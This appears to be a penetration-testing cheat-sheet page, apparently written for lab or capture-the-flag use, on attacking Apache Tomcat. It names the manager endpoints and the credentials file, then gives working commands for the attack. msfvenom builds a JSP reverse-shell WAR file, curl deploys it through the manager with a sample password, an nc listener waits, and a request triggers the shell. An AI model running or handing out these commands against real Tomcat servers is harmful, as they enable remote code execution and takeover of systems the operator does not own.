# Tomcat

Tomcat is like a secondary service usually runs on port 8080

### Intresting Endpoints

```bash
/manager/html
/host-manager/html
```

### Important Files

```bash
tomcat-users.xml # contains usernames and passwords
```

## Exploitation

* Create a malicious .war file deploy it and obtain reverse shell

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war
```

![source : hackingarticles](https://2587790434-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FsIDfsFf4ZaEESeP0YPTJ%2Fuploads%2F9OERDL39vXZzyyo2xW3G%2Ftomcat.png?alt=media\&token=d91c588a-02c9-47e8-a578-aa9a9559bf4c)

* Once deployed make a request to `http://targeturi:8080/shell` to obtain the reverse shell

### NO-GUI

* Whenever there is no GUI, the malicious war file can be still uploaded and deployed which will lead to obtaining a reverse shell

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=1234 -f war > shell.war

# curl --upload-file rev.war 'http://<username>:<password>@<host>:8080/manager/text/deploy?path=/<deploy path>'
curl --upload-file shell.war 'http://tomcat:$3cureP4s5w0rd123!@10.129.113.205:8080/manager/text/deploy?path=/dnoscp'

# listen for a reverse shell
nc -lvnp 1234

# make a request and obtain reverse shell
# curl -L --head http://<host>:8080/deployPath
curl -L --head http://10.129.113.205:8080/dnoscp
```